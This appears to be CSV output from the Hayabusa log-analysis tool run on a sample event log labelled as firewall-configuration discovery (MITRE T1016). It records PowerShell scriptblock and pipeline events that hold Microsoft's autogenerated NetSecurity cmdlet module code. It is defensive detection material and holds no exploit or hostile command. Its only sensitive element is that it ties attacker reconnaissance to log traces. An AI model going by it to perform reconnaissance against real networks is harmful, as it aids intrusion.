Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:06.067 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log," 1.0.0.0 NetIPsecPolicyChange ",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:06.067 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"#requires -version 3.0 if ($(Microsoft.PowerShell.Core\Get-Command Set-StrictMode -Module Microsoft.PowerShell.Core)) { Microsoft.PowerShell.Core\Set-StrictMode -Off } $script:MyModule = $MyInvocation.MyCommand.ScriptBlock.Module $script:ClassName = 'root/standardcimv2/MSFT_NetSecDeltaCollection' $script:ClassVersion = '1.0.0' $script:ModuleVersion = '1.0.0.0' $script:ObjectModelWrapper = 'Microsoft.PowerShell.Cmdletization.Cim.CimCmdletAdapter' $script:PrivateData = Microsoft.PowerShell.Utility\New-Object 'System.Collections.Generic.Dictionary[string,string]' Microsoft.PowerShell.Core\Export-ModuleMember -Function @() function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } }",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:06.067 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } }",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:06.067 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log," 1.0.0.0 NetIPsecDospSetting ",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:06.082 +00:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Get-Command): ""Get-Command"" ParameterBinding(Get-Command): name=""Module""; value=""Microsoft.PowerShell.Core"" ParameterBinding(Get-Command): name=""Name""; value=""Set-StrictMode""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:06.082 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"#requires -version 3.0 if ($(Microsoft.PowerShell.Core\Get-Command Set-StrictMode -Module Microsoft.PowerShell.Core)) { Microsoft.PowerShell.Core\Set-StrictMode -Off } $script:MyModule = $MyInvocation.MyCommand.ScriptBlock.Module $script:ClassName = 'root/standardcimv2/MSFT_NetIPsecDoSPSetting' $script:ClassVersion = '1.0.0' $script:ModuleVersion = '1.0.0.0' $script:ObjectModelWrapper = 'Microsoft.PowerShell.Cmdletization.Cim.CimCmdletAdapter' $script:PrivateData = Microsoft.PowerShell.Utility\New-Object 'System.Collections.Generic.Dictionary[string,string]' Microsoft.PowerShell.Core\Export-ModuleMember -Function @() function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } } function New-NetIPsecDospSetting { [CmdletBinding(SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] param( [Parameter(ParameterSetName='cim:CreateInstance0', Mandatory=$true)] [string] ${Name}, [Parameter(ParameterSetName='cim:CreateInstance0')] [uint32] ${StateIdleTimeoutSeconds}, [Parameter(ParameterSetName='cim:CreateInstance0')] [uint32] ${PerIPRateLimitQueueIdleTimeoutSeconds}, [Parameter(ParameterSetName='cim:CreateInstance0')] [uint32] ${IpV6IPsecUnauthDscp}, [Parameter(ParameterSetName='cim:CreateInstance0')] [uint32] ${IpV6IPsecUnauthRateLimitBytesPerSec}, [Parameter(ParameterSetName='cim:CreateInstance0')] [uint32] ${IpV6IPsecUnauthPerIPRateLimitBytesPerSec}, [Parameter(ParameterSetName='cim:CreateInstance0')] [uint16] ${IpV6IPsecAuthDscp}, [Parameter(ParameterSetName='cim:CreateInstance0')] [uint32] ${IpV6IPsecAuthRateLimitBytesPerSec}, [Parameter(ParameterSetName='cim:CreateInstance0')] [uint16] ${IcmpV6Dscp}, [Parameter(ParameterSetName='cim:CreateInstance0')] [uint32] ${IcmpV6RateLimitBytesPerSec}, [Parameter(ParameterSetName='cim:CreateInstance0')] [uint32] ${IpV6FilterExemptDscp}, [Parameter(ParameterSetName='cim:CreateInstance0')] [uint32] ${IpV6FilterExemptRateLimitBytesPerSec}, [Parameter(ParameterSetName='cim:CreateInstance0')] [uint16] ${DefBlockExemptDscp}, [Parameter(ParameterSetName='cim:CreateInstance0')] [uint32] ${DefBlockExemptRateLimitBytesPerSec}, [Parameter(ParameterSetName='cim:CreateInstance0')] [uint32] ${MaxStateEntries}, [Parameter(ParameterSetName='cim:CreateInstance0')] [uint32] ${MaxPerIPRateLimitQueues}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DospKeyModules] ${EnabledKeyingModules}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DospFlags] ${FilteringFlags}, [Parameter(ParameterSetName='cim:CreateInstance0', Mandatory=$true)] [System.Management.Automation.WildcardPattern[]] ${PublicInterfaceAliases}, [Parameter(ParameterSetName='cim:CreateInstance0', Mandatory=$true)] [System.Management.Automation.WildcardPattern[]] ${PrivateInterfaceAliases}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${PublicV6Address}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${PrivateV6Address}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='cim:CreateInstance0')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='cim:CreateInstance0')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object 'System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]' [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Name')) { [object]$__cmdletization_value = ${Name} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('StateIdleTimeoutSeconds')) { [object]$__cmdletization_value = ${StateIdleTimeoutSeconds} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'StateIdleTimeoutSeconds'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'StateIdleTimeoutSeconds'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PerIPRateLimitQueueIdleTimeoutSeconds')) { [object]$__cmdletization_value = ${PerIPRateLimitQueueIdleTimeoutSeconds} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'PerIPRateLimitQueueIdleTimeoutSeconds'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'PerIPRateLimitQueueIdleTimeoutSeconds'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IpV6IPsecUnauthDscp')) { [object]$__cmdletization_value = ${IpV6IPsecUnauthDscp} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'IpV6IPsecUnauthDscp'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'IpV6IPsecUnauthDscp'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IpV6IPsecUnauthRateLimitBytesPerSec')) { [object]$__cmdletization_value = ${IpV6IPsecUnauthRateLimitBytesPerSec} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'IpV6IPsecUnauthRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'IpV6IPsecUnauthRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IpV6IPsecUnauthPerIPRateLimitBytesPerSec')) { [object]$__cmdletization_value = ${IpV6IPsecUnauthPerIPRateLimitBytesPerSec} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'IpV6IPsecUnauthPerIPRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'IpV6IPsecUnauthPerIPRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IpV6IPsecAuthDscp')) { [object]$__cmdletization_value = ${IpV6IPsecAuthDscp} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'IpV6IPsecAuthDscp'; ParameterType = 'System.UInt16'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'IpV6IPsecAuthDscp'; ParameterType = 'System.UInt16'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IpV6IPsecAuthRateLimitBytesPerSec')) { [object]$__cmdletization_value = ${IpV6IPsecAuthRateLimitBytesPerSec} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'IpV6IPsecAuthRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'IpV6IPsecAuthRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IcmpV6Dscp')) { [object]$__cmdletization_value = ${IcmpV6Dscp} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'IcmpV6Dscp'; ParameterType = 'System.UInt16'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'IcmpV6Dscp'; ParameterType = 'System.UInt16'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IcmpV6RateLimitBytesPerSec')) { [object]$__cmdletization_value = ${IcmpV6RateLimitBytesPerSec} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'IcmpV6RateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'IcmpV6RateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IpV6FilterExemptDscp')) { [object]$__cmdletization_value = ${IpV6FilterExemptDscp} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'IpV6FilterExemptDscp'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'IpV6FilterExemptDscp'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IpV6FilterExemptRateLimitBytesPerSec')) { [object]$__cmdletization_value = ${IpV6FilterExemptRateLimitBytesPerSec} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'IpV6FilterExemptRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'IpV6FilterExemptRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('DefBlockExemptDscp')) { [object]$__cmdletization_value = ${DefBlockExemptDscp} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'DefBlockExemptDscp'; ParameterType = 'System.UInt16'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else {",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:06.082 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"$__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'DefBlockExemptDscp'; ParameterType = 'System.UInt16'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('DefBlockExemptRateLimitBytesPerSec')) { [object]$__cmdletization_value = ${DefBlockExemptRateLimitBytesPerSec} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'DefBlockExemptRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'DefBlockExemptRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('MaxStateEntries')) { [object]$__cmdletization_value = ${MaxStateEntries} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'MaxStateEntries'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'MaxStateEntries'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('MaxPerIPRateLimitQueues')) { [object]$__cmdletization_value = ${MaxPerIPRateLimitQueues} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'MaxPerIPRateLimitQueues'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'MaxPerIPRateLimitQueues'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('EnabledKeyingModules')) { [object]$__cmdletization_value = ${EnabledKeyingModules} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'EnabledKeyingModules'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DospKeyModules'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'EnabledKeyingModules'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DospKeyModules'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('FilteringFlags')) { [object]$__cmdletization_value = ${FilteringFlags} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'FilteringFlags'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DospFlags'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'FilteringFlags'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DospFlags'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PublicInterfaceAliases')) { [object]$__cmdletization_value = ${PublicInterfaceAliases} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'PublicInterfaceAliases'; ParameterType = 'System.Management.Automation.WildcardPattern[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'PublicInterfaceAliases'; ParameterType = 'System.Management.Automation.WildcardPattern[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PrivateInterfaceAliases')) { [object]$__cmdletization_value = ${PrivateInterfaceAliases} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'PrivateInterfaceAliases'; ParameterType = 'System.Management.Automation.WildcardPattern[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'PrivateInterfaceAliases'; ParameterType = 'System.Management.Automation.WildcardPattern[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PublicV6Address')) { [object]$__cmdletization_value = ${PublicV6Address} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'PublicV6Address'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'PublicV6Address'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PrivateV6Address')) { [object]$__cmdletization_value = ${PrivateV6Address} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'PrivateV6Address'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'PrivateV6Address'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('cim:CreateInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_methodInvocationInfo) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecDospSetting.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'New-NetIPsecDospSetting' function Get-NetIPsecDospSetting { [CmdletBinding(DefaultParameterSetName='GetAll', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] 